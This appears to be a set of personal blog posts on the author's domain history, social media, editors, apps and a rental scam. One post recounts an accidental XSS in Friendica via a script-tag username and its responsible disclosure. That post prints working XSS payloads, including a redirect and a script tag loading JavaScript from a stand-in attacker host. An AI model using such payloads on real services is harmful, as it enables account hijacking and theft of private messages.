Honeypot.net

In times of yore, my friends gave their computers cool cyberpunky names so that they sounded cool at LAN parties: “Hey, can you toss me an Ethernet cable for suntzu?” “Sure. Here’s the switch I’m using for chaosium.” My Amiga had a few hard drives to store all the, ahem, public domain music files that we traded around. I don’t know what prompted me to think of it as the honeypot full of music, but it stuck, and I christened it honeypot to be one of the cool kids.

I was working at an ISP and handling domain registration tasks for our customers. It struck me as a great idea to one-up my friends and turn my computer’s name into a full-blown domain name. The .org TLD didn’t feel right because I wasn’t an organization, and definitely didn’t identify with .org’s non-profit connotations. .com also felt wrong because I wasn’t some boring company that had decided to hop on to the Internet to see what the fuss was all about. .net had just the right about of geek cred, so honeypot.net it was.

It was the custom to have a cool and vaguely menacing desktop wallpaper to go with our cool and vaguely menacing handles. If you’ve seen “Hackers”, you’re familiar with those ideas. Here was my pre-honeypot.net background:

That wasn’t good enough to show off my new domain, so I replaced it:

I needed to change things a bit when I acquired a second computer. Instead of using the whole domain name for a single host, I decided on a whim to give each one a name from A. A. Milne’s Winnie-the-Pooh stories. First, Pooh was my childhood stuffed animal best friend, and I still like him. Second, Pooh loves honey, as in a pot of it – a honeypot. Finally, it was an ironic pushback against the scary hacker imagery that was common at the time.

When I registered honeypot.net, about 2 million domains existed. Today there are about 700 million. I wish I’d gotten on the Bitcoin or Apple stock bandwagons that early.

Happy 25th birthday, honeypot.net. We’ve had fun.

Twitter is in a race with Reddit to see who can ruin their service more quickly. That’s the simplest explanation I have for Twitter’s change today that hides all of their users’ posts behind a login page. Until today, you could still view a favorite company’s messages, or a sport team’s highlights, or an interesting author’s opinions, without logging on to the site. If you wanted to interact with that page by liking a post or replying to it, you needed an account. It was free to view those posts, though. And now, it’s not.

For end users, this immediately devalues Twitter as a way to casually catch up with public figures. For those public figures, this immediately devalues Twitter as a way to broadcast messages to the world. The service still has many users today, of course, and those people won’t go away immediately. But most recent public estimates say that Twitter has about 400 million users, or about 1/10th of the world’s online population. Assuming that all of those accounts are real people, which is a giant assumption, that means about 90% of the world can’t see those messages anymore.

A couple of pieces of free advice for people and organizations still posting to Twitter:

1. Investigate the alternatives that are open to readers by default. Facebook and friends also make it hard for casual visitors to see messages without logging in. Many brands have flocked to Mastodon, Micro.blog, and newer services like Bluesky.
2. Track your engagement numbers. If Twitter still reports a similar number of views for your messages after making them inaccessible to 90% of the world, those statistics are probably fake.
3. Blogs and newsletters still exist, and you have complete control over them. Consider communicating with your most loyal followers over open, easy-to-use channels that everyone can access.
4. And finally, start working on your Twitter exit strategy. As the site continues to remove the guardrails that kept it relatively civil and brand-safe, it’s only going to become a worse place to hang out.

I’ve spent way more time on Reddit than I should have. I justified it to myself by saying it was a great way to stay current on news and technology trends. Really, it was just a slow drip of tiny endorphin hits that felt good but ultimately didn’t make my life better.

Thanks to Reddit CEO Steve Huffman’s ham-fisted community management and the resulting moderator and user boycott, I deleted its apps off my devices and stopped visiting the site altogether. The first couple of days were difficult, not in the overwhelming craving way that quitting smoking was hard, but because muscle memory kept trying to open the apps the moment I found myself with a few seconds to spare. That, too, passed.

Thanks, Reddit, for breaking my unhealthy addiction to your site. I couldn’t have done it without you.

My kid and their friend are looking for a house to rent. They found a perfect match, with a nice house in a pretty neighborhood and accommodating landlords, but there were a few red flags.

The last was when the landlords wanted kid and friend to send them money, supposedly because they live in a different state, and then they’d mail the house keys. The landlord also sent the kids a signed lease to sign and return. The signature on that lease didn’t match up with their name:

I did a reverse image search on the signature, and it was L. Ron Hubbard’s signature from his Wikipedia article:

I took no joy in breaking the bad news to the kids, but I praised them profusely for talking to me about it first.

Microsoft developed Language Server Protocol (“LSP”) a few years ago to make it easier to add support for new languages to VS Code. Lots of smart people have written interesting things about LSP and I don’t want to rehash all that, but in summary: it gives people who like using a computer language a standard way to tell VS Code how to work with it.

Thing is, I don’t like VS Code at all. It’s a brilliant program, but under the covers it’s a web browser running a very clever JavaScript program. It doesn’t, and can’t, and won’t, ever feel like a native application, and that bothers me more than it should. I much prefer using what others call Mac-assed Mac apps. This is where LSP shows its real value.

Other apps can support LSP, too. Emacs users wrote a couple of different ways to connect those nifty new language servers to their favorite editor. Voila! Now Emacs has delightful support for every language that VS Code knows how to edit. So does Vim. And now, so do Nova and even the venerable BBEdit.

That last one blew me away. I’d seen it from a distance over the years. It’s impossible to use a Mac as a professional developer without at least being aware that it exists. BBEdit always struck me as a very neat, but very dated, niche editor that people kept using because they were too stubborn to switch. Oh, how wrong I was. I downloaded a copy a couple of weeks ago to kick the tires and found that since it can speak LSP, it might be the best programming environment I’ve ever used on my Mac. (“How’s its Python? Whoa! Is it that good with Rust? Whoa! How about… Terraform files? WHOA!”) 30 years of development as a text editor, plus all the effort that programming language users put into giving LSP broad and deep language support, yielded something that has incredible text mangling abilities and cutting-edge programming features. I love it. I’ve been trialing it as my main editor since then, and every day I appreciate it more.

I think we’re in a new golden age of programming editors. Now that any editor which can use LSP competes on a level playing field, the real competition is in subjective areas like the user interface, responsiveness, ergonomics, and extra functionality. Thanks to VS Code, those Mac-assed Mac apps redefine what developing software on a Mac can be like, and I couldn’t be more pleased with my options.

Update 2023-11-03: No, I don’t.

I tell people not to use Readdle’s Spark email app. Then I turn around and use the Things task manager, which lacks end-to-end encryption (E2EE). That concerns me. I have a PKM note called “Task managers”, and under “Things” my first bullet point is:

• Lacks end-to-end encryption

I realize I’m being hypocritical here, but perhaps only a little bit. There’s a difference in exposure between Things and, say, my PKM notes, archive of scanned documents, email, etc.:

I don’t put highly sensitive information in Things. No, I don’t want my actions in there to be public, but they’re generally no more detailed than “make an allergist appointment” or “ask boss about a raise”. I know some people use Things as a general note-taking app but I don’t. There are other apps more tailored to that and I use them instead.

I control what information goes into Things. If my doctor were to email me sensitive medical test results, the Spark team could hypothetically read them. Cultured Code can only view what I personally choose to put into Things. (That glosses over the “Mail to Things” feature, but I never give that address to anyone else and I don’t worry about it being misused.)

Things can’t impersonate me. Readdle could use my email credentials to contact my boss and pretend to be me. Now, I’m confident that they won’t. They’re a good, reputable company. But they could, and that’s enough to keep me away from Spark.

Finally, Cultured Code is a German company covered by the GDPR. They have strong governmental reasons not to do shady stuff with my data.

While I don’t like that Things lacks E2EE, and I wish that it had it, the lack isn’t important enough for how I want to use it to keep me away from it. There are more secure alternatives like OmniFocus and Reminders, but the benefits that I get from Things over those options makes it worthwhile for me to hold my nose and use it.

Everyone has to make that decision based on their own usage. If you have actions like “send government documents to reporter” or “call patient Amy Jones to tell her about her cancer”, then you shouldn’t use Things or anything else without E2EE. I’d be peeved if my Things actions were leaked, but it wouldn’t ruin my life or get me fired.

But I know I should still look for something more secure.

I’ve used iA Writer on Mac and iPad for years as my main writing environment. I’m typing this in it now. It’s strongly opinionated in the right ways: iA made a lot of design decisions on my behalf so that I’m not distracted by the temptation to fiddle with a thousand configuration knobs instead of, well, writing.

I leaped at the chance to try an early beta of their new iA Presenter app last year. It promised to make writing presentations as easy and pleasant as Writer made it to write words. In fact, their approaches are nearly identical. Both apps encourage you to write down your thoughts, and then they make them look pretty. Oh, how Presenter delivers on that promise! Rather than nudge me toward tweaking fonts, layout, page transitions, and all the other styling options you can possibly apply to a PowerPoint slide, it gives me an editor window where I write Markdown text. Then it renders that text as a series of beautifully styled, elegant slides. And with a couple of clicks, it can publish that presentation as a PDF that mixes slide content with narrator notes in a format that an audience can appreciate.

iA officially launched Presenter today and I bought my (one-time purchase! non-subscription!) license immediately. I’m grateful that I’m not regularly expected to talk to crowds. I’m also grateful that when I do, Presenter exists and saves me from the additional stress of trying to make my content look nice on a screen. It’s everything I love and appreciate about Writer’s approach to public writing, applied to public speaking. Congratulations, iA, and thanks!

Last summer I tried to hack the Wall of Sheep at DEF CON. It didn’t work. The short version is that I tried to make a Cross Site Scripting (XSS) attack against the Wall by crafting a username:

<script type="text/javascript">alert("I was here.");</script>

Because I’m kind of a smartass, I later changed my Mastodon username to something similar:

<script>alert("Tek");</script>

Then I laughed about it with my geeky friends and promptly forgot all about the joke.

And then late at night on Mother’s Day Eve this year, some people started sending me messages like “why is your name popping up on my screen?” and “please make that stop” and “DUDE NO REALLY PLEASE STOP IT”. I had another laugh and tried to go to sleep, until I realized, oh, this isn’t good. Those people were all on various Friendica instances, and when my username came across their timeline, the server software was incorrectly embedding it in the HTML as a real <script> tag instead of displaying it as the literal text <script>alert("Tek");</script>. In the web world, that’s about as bad as an attack can get. The US government’s CVSS calculator scored it as a perfect 10.0.

• An attacker (me, by accident, in this case) could exploit the vulnerability without having any access to those Friendica instances.
• The attack was simple: I changed my username to a bit of valid JavaScript.
• All I had to do to trigger the vulnerability was to get my username to show up on the victim’s screen. If I sent them a message, or if any of their friends saw and boosted my message so that it appeared in the victim’s timeline, then the trap was sprung.
• My little joke was annoying but harmless. A malicious attacker could just as easily change their username to

<script src="https://hackerz.ru/badstuff.js">Hi</script>

• The malicious JavaScript could do literally anything with the victim’s account that the victim could do. It could look at all their private messages and upload them to another server, or change their password, or message all of their friends, or change their own username to be another bit of malicious JavaScript and start a chain reaction.

That wasn’t funny at all. I got up and dashed off an email to Friendica’s security email address. I also found that some of the people I’d been talking to via Mastodon were Friendica maintainers, and I messaged them with my concerns.¹ Satisfied that the right people had been notified, I went back to bed.

The next morning I told my wife and kid about the unexpected evening I’d had. My kid instantly piped up with “Dad! Dad! You should change it to a Rickroll!”²

My jaw hit the floor. Yes, of course. It must be done. My amazing wife egged me on by insisting that as it was Mother’s Day, I owed this to her. After a little experimentation, I came up with a new username:

<script>window.location="https://is.gd/WVZvnI#TekWasHere"</script>

It was a little longer than the maximum of 30 characters that Mastodon allows you to enter, but since I have direct access to my Mastodon instance’s database, it was easy to work around that limit.

I began receiving new messages that I’m pretty sure were all in good humor. Well, somewhat sure.

To their vast credit, the Friendica gang pounced on the problem quickly. Some instances rolled out a preliminary fix later that day. A week after, the team rolled out a new public release so that all other Friendica admins could patch their systems.

It’s easy to make a mistake. That’s inevitable. The world would be better if everyone reacted like the Friendica maintainers, by asking questions, finding a solution, then quickly fixing those mistakes. Well done.

I used to think the Copied clipboard manager for Apple devices was spiffy. I don’t know how or why, but that app disappeared from the Internet and the App Stores.

PastePal seems to be its spiritual successor. It works perfectly, it syncs across devices, and the pro version is a one-time, reasonable $15 purchase. It’s the only clipboard manager I’ve found that checks all those boxes.

I worked as a software developer with a strongly opinionated manager. He believed that we’d achieve Peak Programmer Productivity™️ by standardizing on one common desktop setup. Of course, that meant we’d all be writing Python code in Eclipse or some other similar abomination that he liked that month. This is for him.

From now on, we’ll all play the piano. This nonsense of everyone knowing a different instrument is costing us time and money. I’ve played the piano for years, and I know you’re going to like it.

Yes, you too, violinists. Vibrato? In my time as a pianist, I’ve never needed it.

Drums? A piano is a percussion instrument. How many kinds of percussion do we need? What’s that? No, they’re not that different. Tempo, rhythms, yes, yes, we’ll still have all that.

Huh, woodwinds. Good point. Well, there are more percussion and string players than woodwind…ists, so they can figure something out.

OK, we’re getting sidetracked here. Look, this is going to be good for you, too! There are more pianos than violins – yes, and clarinets… what’s that? Yes, and probably trumpets, too. Anyway, there are a lot of pianos. The next place you go will probably have a piano, so you’ll have a leg up if you ever leave here. Not that you would, am I right? But see, I’m only thinking of your careers.

Yes, I know we’re picking my favorite instrument. That’s a coincidence. I’ve looked into lots of instruments, but we can all agree that pianos have certain advantages that… Who threw that? Indoor voices, please! Anyway, I’ve looked into lots of instruments… no, I haven’t ever played a flute, but you’ll find that… no, I will not be shoving a piano there, thank you very much!

Alright, meeting’s over. Pianos. That’s what we’re all using, starting — hey, I don’t appreciate that language. Let’s all act like professional adults here.

Pianos.